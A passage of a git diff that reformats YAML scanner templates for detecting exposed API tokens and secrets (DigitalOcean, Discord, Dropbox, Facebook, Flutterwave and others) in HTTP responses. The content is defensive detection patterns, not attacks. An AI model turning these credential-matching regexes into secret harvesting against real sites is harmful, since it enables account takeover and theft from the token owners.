.]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml index 08942aa5df..4a0289fca6 100644 --- a/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml +++ b/http/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -5,16 +5,16 @@ info: author: geeknik severity: critical description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments. + remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom reference: - https://github.com/pry0cc/axiom classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-425 - remediation: Restrict access to the do.json file or upgrade to a newer version of Axiom - tags: axiom,digitalocean,key,exposure metadata: max-request: 1 + tags: axiom,digitalocean,key,exposure http: - method: GET diff --git a/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml b/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml index bf07f0129f..eb35807536 100644 --- a/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml +++ b/http/exposures/tokens/digitalocean/digital-ocean-personal-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml - https://docs.digitalocean.com/reference/api/ metadata: - max-request: 1 verified: true + max-request: 1 tags: digitalocean,exposure,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(dop_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dop_v1_[a-f0-9]{64})\b diff --git a/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml b/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml index 760da3de91..5fc31f4c99 100644 --- a/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml +++ b/http/exposures/tokens/digitalocean/digitalocean-app-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml - https://docs.digitalocean.com/reference/api/ metadata: - max-request: 1 verified: true + max-request: 1 tags: digitalocean,exposure,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(doo_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(doo_v1_[a-f0-9]{64})\b diff --git a/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml b/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml index 2bb5689e23..563a595957 100644 --- a/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml +++ b/http/exposures/tokens/digitalocean/digitalocean-refresh.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml - https://docs.digitalocean.com/reference/api/ metadata: - max-request: 1 verified: true + max-request: 1 tags: digitalocean,exposure,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)\b(dor_v1_[a-f0-9]{64})\b \ No newline at end of file + - (?i)\b(dor_v1_[a-f0-9]{64})\b diff --git a/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml b/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml index 0d8eda9e59..e5ba9ce381 100644 --- a/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml +++ b/http/exposures/tokens/digitalocean/tugboat-config-exposure.yaml @@ -8,9 +8,9 @@ info: reference: - https://github.com/petems/tugboat - https://www.digitalocean.com/community/tools/tugboat - tags: tugboat,config,exposure metadata: max-request: 1 + tags: tugboat,config,exposure http: - method: GET diff --git a/http/exposures/tokens/discord/discord-clientid.yaml b/http/exposures/tokens/discord/discord-clientid.yaml index e78720c766..7a1db8ae44 100644 --- a/http/exposures/tokens/discord/discord-clientid.yaml +++ b/http/exposures/tokens/discord/discord-clientid.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go metadata: - max-request: 1 verified: true + max-request: 1 tags: discord,exposure,tokens,clientid http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/discord/discord-clientsecret.yaml b/http/exposures/tokens/discord/discord-clientsecret.yaml index e2e4ad1d7b..df1f140899 100644 --- a/http/exposures/tokens/discord/discord-clientsecret.yaml +++ b/http/exposures/tokens/discord/discord-clientsecret.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go metadata: - max-request: 1 verified: true + max-request: 1 tags: discord,exposure,tokens,clientid http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/discord/discord-token.yaml b/http/exposures/tokens/discord/discord-token.yaml index e8b8052763..31677c103f 100644 --- a/http/exposures/tokens/discord/discord-token.yaml +++ b/http/exposures/tokens/discord/discord-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: discord,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/discord/discord-webhook.yaml b/http/exposures/tokens/discord/discord-webhook.yaml index 1b67a981c6..23e1da3be5 100755 --- a/http/exposures/tokens/discord/discord-webhook.yaml +++ b/http/exposures/tokens/discord/discord-webhook.yaml @@ -4,9 +4,9 @@ info: name: Discord Webhook Disclosure author: Ice3man severity: info - tags: exposure,token,discord metadata: max-request: 1 + tags: exposure,token,discord http: - method: GET @@ -17,4 +17,4 @@ http: - type: regex part: body regex: - - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' \ No newline at end of file + - 'https://discordapp\.com/api/webhooks/[0-9]+/[A-Za-z0-9\-]+' diff --git a/http/exposures/tokens/docker/dockercfg-config.yaml b/http/exposures/tokens/docker/dockercfg-config.yaml index 113067925f..43157f2ca2 100644 --- a/http/exposures/tokens/docker/dockercfg-config.yaml +++ b/http/exposures/tokens/docker/dockercfg-config.yaml @@ -5,9 +5,9 @@ info: author: geeknik severity: high description: Docker registry authentication data - tags: docker,exposure,config metadata: max-request: 2 + tags: docker,exposure,config http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word words: - '"email":' diff --git a/http/exposures/tokens/doppler/doppler-token.yaml b/http/exposures/tokens/doppler/doppler-token.yaml index 52c1337ec4..d7c561e729 100644 --- a/http/exposures/tokens/doppler/doppler-token.yaml +++ b/http/exposures/tokens/doppler/doppler-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: doppler,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (dp\.pt\.)(?i)[a-z0-9]{43} \ No newline at end of file + - (dp\.pt\.)(?i)[a-z0-9]{43} diff --git a/http/exposures/tokens/droneci/droneci-accesstoken.yaml b/http/exposures/tokens/droneci/droneci-accesstoken.yaml index f74624e193..043673a622 100644 --- a/http/exposures/tokens/droneci/droneci-accesstoken.yaml +++ b/http/exposures/tokens/droneci/droneci-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: droneci,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/dropbox/dropbox-long-token.yaml b/http/exposures/tokens/dropbox/dropbox-long-token.yaml index c84189a087..aab9e49604 100644 --- a/http/exposures/tokens/dropbox/dropbox-long-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-long-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: dropbox,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/dropbox/dropbox-short-token.yaml b/http/exposures/tokens/dropbox/dropbox-short-token.yaml index afa5dbe513..81997898d1 100644 --- a/http/exposures/tokens/dropbox/dropbox-short-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-short-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: dropbox,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/dropbox/dropbox-token.yaml b/http/exposures/tokens/dropbox/dropbox-token.yaml index bb217c1966..6db82d8454 100644 --- a/http/exposures/tokens/dropbox/dropbox-token.yaml +++ b/http/exposures/tokens/dropbox/dropbox-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: dropbox,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/duffel/duffel-token.yaml b/http/exposures/tokens/duffel/duffel-token.yaml index 1c1c95d555..91e4acaedc 100644 --- a/http/exposures/tokens/duffel/duffel-token.yaml +++ b/http/exposures/tokens/duffel/duffel-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: duffel,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} \ No newline at end of file + - duffel_(test|live)_(?i)[a-z0-9_\-=]{43} diff --git a/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml b/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml index 871ee4d02f..671d6a2112 100644 --- a/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml +++ b/http/exposures/tokens/dynatrace/dynatrace-api-token.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/dynatrace.yml metadata: - max-request: 1 verified: true + max-request: 1 tags: dynatrace,token,exposure http: @@ -20,4 +20,4 @@ http: - type: regex part: body regex: - - '\b(dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64})\b' \ No newline at end of file + - '\b(dt0[a-zA-Z]{1}[0-9]{2}\.[A-Z0-9]{24}\.[A-Z0-9]{64})\b' diff --git a/http/exposures/tokens/easypost/easypost-testtoken.yaml b/http/exposures/tokens/easypost/easypost-testtoken.yaml index 0ec71d54e5..9812494a1f 100644 --- a/http/exposures/tokens/easypost/easypost-testtoken.yaml +++ b/http/exposures/tokens/easypost/easypost-testtoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: easypost,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - EZTK(?i)[a-z0-9]{54} \ No newline at end of file + - EZTK(?i)[a-z0-9]{54} diff --git a/http/exposures/tokens/easypost/easypost-token.yaml b/http/exposures/tokens/easypost/easypost-token.yaml index 15a504fb44..8489a6f627 100644 --- a/http/exposures/tokens/easypost/easypost-token.yaml +++ b/http/exposures/tokens/easypost/easypost-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: easypost,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - EZAK(?i)[a-z0-9]{54} \ No newline at end of file + - EZAK(?i)[a-z0-9]{54} diff --git a/http/exposures/tokens/etsy/etsy-accesstoken.yaml b/http/exposures/tokens/etsy/etsy-accesstoken.yaml index e434095950..9368fd2baa 100644 --- a/http/exposures/tokens/etsy/etsy-accesstoken.yaml +++ b/http/exposures/tokens/etsy/etsy-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: etsy,exposure,tokens,accesskey http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/facebook/facebook-access-token.yaml b/http/exposures/tokens/facebook/facebook-access-token.yaml index 1a9f14dbd0..35b11e2c05 100644 --- a/http/exposures/tokens/facebook/facebook-access-token.yaml +++ b/http/exposures/tokens/facebook/facebook-access-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/facebook.yml - https://developers.facebook.com/docs/facebook-login/access-tokens/ metadata: - max-request: 1 verified: true + max-request: 1 tags: facebook,token,exposure http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' \ No newline at end of file + - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' diff --git a/http/exposures/tokens/facebook/facebook-token.yaml b/http/exposures/tokens/facebook/facebook-token.yaml index ee5b415337..f6bef65287 100644 --- a/http/exposures/tokens/facebook/facebook-token.yaml +++ b/http/exposures/tokens/facebook/facebook-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go metadata: - max-request: 1 verified: true + max-request: 1 tags: facebook,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/fastly/fastly-token.yaml b/http/exposures/tokens/fastly/fastly-token.yaml index e6c2ec9e7a..175eb0293f 100644 --- a/http/exposures/tokens/fastly/fastly-token.yaml +++ b/http/exposures/tokens/fastly/fastly-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: fastly,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/figma/figma-personal-token.yaml b/http/exposures/tokens/figma/figma-personal-token.yaml index 0be233e4bf..2590bd12bd 100644 --- a/http/exposures/tokens/figma/figma-personal-token.yaml +++ b/http/exposures/tokens/figma/figma-personal-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/figma.yml - https://www.figma.com/developers/api metadata: - max-request: 1 verified: true + max-request: 1 tags: figma,exposure,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b \ No newline at end of file + - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b diff --git a/http/exposures/tokens/finicity/finicity-clientsecret.yaml b/http/exposures/tokens/finicity/finicity-clientsecret.yaml index fa1963d59e..9045c3944b 100644 --- a/http/exposures/tokens/finicity/finicity-clientsecret.yaml +++ b/http/exposures/tokens/finicity/finicity-clientsecret.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go metadata: - max-request: 1 verified: true + max-request: 1 tags: finicity,file,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/finicity/finicity-token.yaml b/http/exposures/tokens/finicity/finicity-token.yaml index 38dd2c6648..3a45a78d25 100644 --- a/http/exposures/tokens/finicity/finicity-token.yaml +++ b/http/exposures/tokens/finicity/finicity-token.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: finicity,file,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml index 48fcae3f14..3d93e8ec71 100644 --- a/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml +++ b/http/exposures/tokens/finnhub/finnhub-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: finnhub,file,token http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/flickr/flickr-accesstoken.yaml b/http/exposures/tokens/flickr/flickr-accesstoken.yaml index 7c8f07deb6..05347bc81d 100644 --- a/http/exposures/tokens/flickr/flickr-accesstoken.yaml +++ b/http/exposures/tokens/flickr/flickr-accesstoken.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go metadata: - max-request: 1 verified: true + max-request: 1 tags: flickr,exposure,tokens http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) diff --git a/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml b/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml index 87ea37de9a..2f340ce4ec 100644 --- a/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go metadata: - max-request: 1 verified: true + max-request: 1 tags: flutterwave,exposure,tokens,encryption http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - FLWSECK_TEST-(?i)[a-h0-9]{12} \ No newline at end of file + - FLWSECK_TEST-(?i)[a-h0-9]{12} diff --git a/http/exposures/tokens/flutter/flutterwave-publickey.yaml b/http/exposures/tokens/flutter/flutterwave-publickey.yaml index 0104f22c9b..72f7c2f788 100644 --- a/http/exposures/tokens/flutter/flutterwave-publickey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-publickey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml metadata: - max-request: 1 verified: true + max-request: 1 tags: flutterwave,exposure,tokens,publickey http: @@ -21,4 +21,4 @@ http: - type: regex part: body regex: - - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X \ No newline at end of file + - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X diff --git a/http/exposures/tokens/flutter/flutterwave-secretkey.yaml b/http/exposures/tokens/flutter/flutterwave-secretkey.yaml index b5eb5d530e..092085d8b2 100644 --- a/http/exposures/tokens/flutter/flutterwave-secretkey.yaml +++ b/http/exposures/tokens/flutter/flutterwave-secretkey.yaml @@ -8,8 +8,8 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml - 